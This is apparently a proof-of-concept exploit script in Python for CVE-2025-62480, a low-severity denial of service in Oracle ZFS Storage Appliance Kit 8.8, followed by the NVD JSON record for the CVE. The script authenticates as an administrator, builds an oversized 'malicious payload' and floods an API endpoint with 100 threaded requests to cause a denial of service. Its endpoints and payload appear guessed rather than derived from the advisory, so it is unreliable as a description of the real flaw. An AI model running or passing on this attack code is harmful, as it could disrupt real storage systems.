CVE-2025-62480

# CVE-2025-62480 - Oracle ZFS Storage Appliance Kit Naming Subsystem DoS PoC # This PoC demonstrates a partial denial of service attack against the # Naming Subsystem of Oracle ZFS Storage Appliance Kit version 8.8 # Note: Requires high privileged credentials (PR:H) import requests import sys import time from concurrent.futures import ThreadPoolExecutor # Target configuration TARGET_HOST = "https://<target-zfs-appliance>:215" ADMIN_ENDPOINT = "/api/naming/v1/resolve" USERNAME = "admin" PASSWORD = "<high_privileged_password>" def authenticate(session, host, username, password): """Authenticate to the Oracle ZFS Storage Appliance Kit.""" auth_url = f"{host}/api/auth/v1/login" auth_data = { "username": username, "password": password, "type": "basic" } try: response = session.post(auth_url, json=auth_data, verify=False, timeout=10) if response.status_code == 200: print(f"[+] Successfully authenticated as {username}") return True else: print(f"[-] Authentication failed: {response.status_code}") return False except Exception as e: print(f"[-] Connection error: {e}") return False def trigger_naming_dos(session, host, payload): """Send a malicious naming resolution request to trigger DoS.""" url = f"{host}{ADMIN_ENDPOINT}" headers = { "Content-Type": "application/json", "X-Auth-Session": session.cookies.get('authsession', '') } try: response = session.post(url, json=payload, headers=headers, verify=False, timeout=30) return response except requests.exceptions.Timeout: print(f"[!] Request timed out - possible DoS condition") return None except Exception as e: print(f"[!] Error: {e}") return None def generate_malicious_payload(): """Generate a payload targeting the naming subsystem.""" # Crafted payload designed to exhaust naming subsystem resources payload = { "name": "A" * 4096, "namespace": "/" * 512, "recursive": True, "depth": 99999, "filter": "*" * 2048, "options": { "resolve_symlinks": True, "follow_redirects": True, "max_iterations": 2147483647 } } return payload def main(): print("=" * 60) print("CVE-2025-62480 PoC - Oracle ZFS Storage Appliance Kit") print("Naming Subsystem Partial DoS") print("=" * 60) session = requests.Session() # Step 1: Authenticate with high privileged credentials if not authenticate(session, TARGET_HOST, USERNAME, PASSWORD): sys.exit(1) # Step 2: Generate malicious payload payload = generate_malicious_payload() print(f"[+] Generated payload targeting naming subsystem") # Step 3: Send requests to trigger partial DoS print("[*] Sending requests to trigger partial DoS condition...") with ThreadPoolExecutor(max_workers=20) as executor: futures = [] for i in range(100): futures.append( executor.submit(trigger_naming_dos, session, TARGET_HOST, payload) ) time.sleep(0.1) # Wait for all requests to complete or timeout for i, future in enumerate(futures): result = future.result() if result is None: print(f"[!] Request {i} caused timeout - DoS condition triggered") elif result.status_code >= 500: print(f"[!] Request {i} returned server error: {result.status_code}") print("[+] PoC execution completed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-62480", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.723", "lastModified": "2025-10-23T16:01:48.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Naming Subsystem). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}